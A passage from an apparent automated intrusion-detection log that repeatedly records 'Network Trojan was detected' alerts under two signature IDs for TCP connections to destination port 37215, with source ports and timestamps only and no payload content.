          SID:2835222
          Source Port:59596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954672
          SID:2835222
          Source Port:40658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163026
          SID:2829579
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397428
          SID:2829579
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400451
          SID:2829579
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557636
          SID:2835222
          Source Port:43650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224901
          SID:2835222
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029893
          SID:2829579
          Source Port:45588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538977
          SID:2835222
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713016
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987105
          SID:2829579
          Source Port:59804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643656
          SID:2835222
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596098
          SID:2835222
          Source Port:57572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288624
          SID:2835222
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473780
          SID:2835222
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713876
          SID:2835222
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942170
          SID:2829579
          Source Port:38680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075639
          SID:2829579
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465564
          SID:2829579
          Source Port:50092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252621
          SID:2829579
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226131
          SID:2835222
          Source Port:45514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944555
          SID:2829579
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302732
          SID:2829579
          Source Port:50506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948351
          SID:2829579
          Source Port:33124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951918
          SID:2835222
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285148
          SID:2829579
          Source Port:35654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249587
          SID:2835222
          Source Port:35496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133421
          SID:2829579
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929935
          SID:2829579
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035022
          SID:2835222
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719979
          SID:2835222
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166751
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684699
          SID:2829579
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036643
          SID:2829579
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991935
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415916
          SID:2835222
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207013
          SID:2829579
          Source Port:57760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037890
          SID:2829579
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869205
          SID:2829579
          Source Port:41360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281973
          SID:2829579
          Source Port:41650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230385
          SID:2835222
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250471
          SID:2829579
          Source Port:57736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719957
          SID:2829579
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863838
          SID:2835222
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600941
          SID:2835222
          Source Port:51020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222594
          SID:2835222
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038392
          SID:2835222
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400432
          SID:2829579
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538834
          SID:2835222
          Source Port:37834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928915
          SID:2829579
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719128
          SID:2835222
          Source Port:43862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037538
          SID:2835222
          Source Port:44608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420208
          SID:2835222
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103697
          SID:2835222
          Source Port:43026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925438
          SID:2835222
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870768
          SID:2829579
          Source Port:43282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082926
          SID:2835222
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164549
          SID:2835222
          Source Port:48296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412302
          SID:2835222
          Source Port:34930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989319
          SID:2829579
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643433
          SID:2835222
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924520
          SID:2829579
          Source Port:58906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724050
          SID:2829579
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312909
          SID:2835222
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863358
          SID:2829579
          Source Port:48746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244795
          SID:2829579
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292902
          SID:2835222
          Source Port:33614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467833
          SID:2829579
          Source Port:44334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248127
          SID:2835222
          Source Port:50588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718710
          SID:2829579
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715805
          SID:2829579
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000801
          SID:2829579
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678051
          SID:2829579
          Source Port:41516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988916
          SID:2835222
          Source Port:38766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230074
          SID:2835222
          Source Port:56006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863783
          SID:2829579
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822582
          SID:2835222
          Source Port:35682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988900
          SID:2829579
          Source Port:45242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413606
          SID:2835222
          Source Port:59870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468057
          SID:2829579
          Source Port:46248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033104
          SID:2835222
          Source Port:42400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419073
          SID:2829579
          Source Port:40012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721544
          SID:2829579
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719168
          SID:2829579
          Source Port:38312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415434
          SID:2835222
          Source Port:48280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567451
          SID:2829579
          Source Port:35508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818731
          SID:2835222
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721357
          SID:2835222
          Source Port:46514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919528
          SID:2835222
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205835
          SID:2829579
          Source Port:35212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074638
          SID:2835222
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205605
          SID:2835222
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077406
          SID:2835222
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891002
          SID:2829579
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.229998
          SID:2829579
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925268
          SID:2829579
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925335
          SID:2829579
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396506
          SID:2835222
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996517
          SID:2829579
          Source Port:36994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289396
          SID:2835222
          Source Port:41298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120937
          SID:2835222
          Source Port:55870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719835
          SID:2829579
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399836
          SID:2829579
          Source Port:49990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668705
          SID:2829579
          Source Port:41838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558011
          SID:2829579
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2829579
          Source Port:50916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417594
          SID:2829579
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908938
          SID:2829579
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166774
          SID:2829579
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079148
          SID:2835222
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719955
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929123
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942117
          SID:2829579
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568258
          SID:2829579
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305023
          SID:2829579
          Source Port:40904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.647001
          SID:2835222
          Source Port:35402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267554
          SID:2835222
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471261
          SID:2835222
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719885
          SID:2829579
          Source Port:37838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740662
          SID:2835222
          Source Port:53844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944279
          SID:2835222
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954059
          SID:2829579
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823174
          SID:2835222
          Source Port:50306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820823
          SID:2829579
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289257
          SID:2835222
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131169
          SID:2835222
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285690
          SID:2835222
          Source Port:32942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292201
          SID:2829579
          Source Port:55272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905501
          SID:2829579
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101959
          SID:2835222
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714159
          SID:2829579
          Source Port:56802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296826
          SID:2835222
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165958
          SID:2829579
          Source Port:57080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164661
          SID:2835222
          Source Port:50212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944511
          SID:2835222
          Source Port:44194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163924
          SID:2835222
          Source Port:35258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412873
          SID:2835222
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274338
          SID:2829579
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923700
          SID:2835222
          Source Port:57772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993227
          SID:2835222
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130630
          SID:2829579
          Source Port:50082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004378
          SID:2835222
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987209
          SID:2835222
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2835222
          Source Port:54918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080438
          SID:2829579
          Source Port:45628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289184
          SID:2835222
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398657
          SID:2829579
          Source Port:37004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719713
          SID:2829579
          Source Port:39970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159405
          SID:2829579
          Source Port:51582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080172
          SID:2829579
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399252
          SID:2835222
          Source Port:46774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294247
          SID:2835222
          Source Port:54450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.949044
          SID:2829579
          Source Port:33850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818692
          SID:2835222
          Source Port:36184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396071
          SID:2835222
          Source Port:47308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909481
          SID:2835222
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280575
          SID:2835222
          Source Port:58026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396105
          SID:2835222
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467957
          SID:2835222
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478075
          SID:2829579
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285771
          SID:2835222
          Source Port:50778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605639
          SID:2835222
          Source Port:46050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417446
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037066
          SID:2829579
          Source Port:50510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721271
          SID:2829579
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637811
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030390
          SID:2835222
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037730
          SID:2829579
          Source Port:33718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2835222
          Source Port:54586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292870
          SID:2835222
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018074
          SID:2829579
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929052
          SID:2829579
          Source Port:60418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653461
          SID:2829579
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289553
          SID:2835222
          Source Port:59742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915716
          SID:2835222
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926031
          SID:2835222
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035225
          SID:2829579
          Source Port:44338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860789
          SID:2835222
          Source Port:41134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919024
          SID:2835222
          Source Port:50340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862740
          SID:2835222
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568072
          SID:2835222
          Source Port:38086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163765
          SID:2835222
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291227
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719002
          SID:2829579
          Source Port:34288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606748
          SID:2829579
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861209
          SID:2829579
          Source Port:37502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719061
          SID:2829579
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600297
          SID:2835222
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034262
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930383
          SID:2835222
          Source Port:51118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716861
          SID:2829579
          Source Port:38116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569535
          SID:2829579
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905489
          SID:2835222
          Source Port:48108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080526
          SID:2835222
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718872
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564978
          SID:2835222
          Source Port:59132
          Destination Port:37215
